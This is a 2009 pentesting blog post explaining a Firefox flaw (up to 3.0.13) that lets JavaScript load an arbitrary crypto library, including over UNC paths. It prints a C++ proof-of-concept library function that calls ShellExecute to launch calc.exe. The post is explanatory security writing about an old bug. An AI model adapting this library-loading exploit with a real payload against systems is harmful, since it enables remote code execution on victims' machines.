0x0e.org | pentesting perspective

braindump on pentesting, QA, metasploit, constant learning

Call an arbitrary library with JavaScript? I think i will.

leave a comment »

This is a handy way to execute code within the browser. Kudos to Jesse Ruderman and Dan Kaminsky for the bug discovery and POC.

Essentially, in Firefox up through 3.0.13 (my ubuntu 9.04 is running 3.0.11), there’s a publicly exposed javascript function which allows you to call an arbitrary crypto library on the system. Assuming you’re able to place a malicious library (see below) in the target environment, you could use this to get other systems to execute it. Extra win, you can use UNC paths to locate the library 🙂

Source is here. <– note, this is live, but it’s calling a non-existent crypto library.

The malicious library would need a function named CPkunkcsApp(), which, in this case, just calls ShellExecute.

<font face="monospace">CpkunkcsApp::CpkunkcsApp()
    char *str = "c:\\windows\\system32\\calc.exe";
    wchar_t *wText;
    size_t len;
    len = strlen(str)+1;
    wText = new wchar_t[strlen(str)];
    memset(wText, 0, len * sizeof(wchar_t));
    ::MultiByteToWideChar(CP_ACP, NULL, str, -1, wText, len);
    ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW);


Written by jcran

September 13, 2009 at 9:17 PM

Posted in Uncategorized

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: